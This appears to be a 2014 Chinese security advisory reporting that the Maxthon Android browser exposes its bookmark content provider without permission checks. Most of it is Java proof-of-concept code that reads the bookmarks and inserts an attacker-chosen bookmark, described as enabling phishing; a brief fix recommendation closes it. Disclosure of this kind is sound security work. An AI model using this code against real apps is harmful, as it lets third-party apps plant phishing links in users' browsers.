首页 > 安全 > 系统安全 >

傲游浏览器限制不严格可导致网页欺诈攻击

2014-01-09

BrowserProvider导出且没有权限限制,可以通过此修改其中的书签栏等等,可以增加一些钓鱼网站伪造等等情况。利用代码:private void testprovider() {int i = 0; ContentResolver co

BrowserProvider导出且没有权限限制,可以通过此修改其中的书签栏等等,可以增加一些钓鱼网站伪造等等情况。
利用代码:
private void testprovider()

    {

int i = 0;

        ContentResolver contentres = getContentResolver();

        Uri uri = Uri.parse("content://com.mx.browser.browserprovider/bookmark");

        Cursor cursor = contentres.query(uri, null, null, null, null);

        do

        {

   

            i++;

      Log.i("Test", (new StringBuilder("personid=")).append(cursor.getInt(0)).append(",name=").append(cursor.getString(4)).toString());

            if (!cursor.moveToNext())

            {

             Log.i("Test",String.valueOf(i));

                ContentValues contentNow = new ContentValues();

                contentNow.put("parent", "0");

                contentNow.put("guid", "clkyg2CaRNeKZr6RDevtUw==");

                contentNow.put("title", "xxx");

                contentNow.put("url", "https://xxx.com");

                contentres.insert(uri, contentNow);

                Log.i("Test", "update ok");

             //cursor.close();

                return;

            }

            

        } while (true);

    }

运行后,会自动在书签栏增加你所要的url
修复方案:
对BrowserProvider的操作做下限制
相关文章
最新文章
热点推荐